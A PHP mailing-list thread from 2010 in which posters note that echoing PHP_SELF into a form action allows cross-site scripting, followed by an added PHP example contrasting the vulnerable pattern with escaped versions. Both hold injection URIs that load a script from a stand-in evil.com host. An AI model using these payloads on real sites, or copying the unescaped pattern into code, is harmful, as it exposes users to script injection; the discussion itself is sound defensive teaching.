On 3/10/10 11:39 PM, Daniel Egeberg wrote:
> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote:
>> Hi Jochem,
>>
>> Jochem Maas wrote:
>>>
>>> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>>>>
>>>> Looks to me like you are closing your form before you put anything in
>>>> it. Therefore, the loan_amount is not set, making the value 0. Follow
>>>> the math, and you are dividing by 1-1.
>>>>
>>>> Change this line:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>>
>>>> to:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>
>>> this is an XSS waiting to happen. I can put something like the following in
>>> the request URI:
>>>
>>> index.php?" onsubmit="evil()"><script
>>> src="http://www.evil.com/evi.js"></script>
>>>
>> Apparently it's not going to work. PHP_SELF does not include the query string.
>> So it is safe to use it this way.
>>
>> Regards,
>> Dmitry
>
> No, it is not safe...
>
> This won't work:
> index.php?" onsubmit="evil()"><script
> src="http://www.evil.com/evi.js"></script>
>
> But this will:
> index.php/" onsubmit="evil()"><script
> src="http://www.evil.com/evi.js"></script>

Yeah, sorry, I was lax and made the query string mistake; the issue stands though, as Daniel pointed out.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
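The form-action pattern discussed in the thread, beside two hardened versions, as an added example that is not part of the original posts. It assumes a CLI run where `$_SERVER['PHP_SELF']` is set by hand to a constructed value mirroring Daniel's path-info request; the function names are hypothetical.

```php
<?php
// Added example (not from the thread). PHP_SELF is the script path plus
// any PATH_INFO the client appended, so a request for
// "/index.php/<anything>" reflects <anything> into the page. The query
// string is NOT part of PHP_SELF, which is why Dmitry's test did not fire.

// Vulnerable: the thread's pattern, reflecting PHP_SELF verbatim into an
// HTML attribute. A double quote in PATH_INFO closes the attribute.
function form_action_unsafe(): string
{
    return '<form action="' . $_SERVER['PHP_SELF'] . '" method="post">';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES escapes both
// quote characters, so the attribute cannot be terminated early.
function form_action_escaped(): string
{
    $self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Preferred: do not reflect client-controlled input at all. A form with no
// action attribute submits to the URL of the current document, which is what
// the PHP_SELF idiom was trying to achieve anyway.
function form_action_omitted(): string
{
    return '<form method="post">';
}

// Constructed value: what PHP_SELF holds for the path-info request quoted in
// the thread (request line: GET /index.php/" onsubmit="evil()">... ).
$_SERVER['PHP_SELF'] = '/index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>';

echo "Unsafe:  ", form_action_unsafe(), "\n";   // attribute broken, markup injected
echo "Escaped: ", form_action_escaped(), "\n";  // quotes and angle brackets encoded
echo "Omitted: ", form_action_omitted(), "\n";  // nothing reflected
```

Run with `php example.php` and compare the three lines: only the first one contains a live `onsubmit` handler and `<script>` tag.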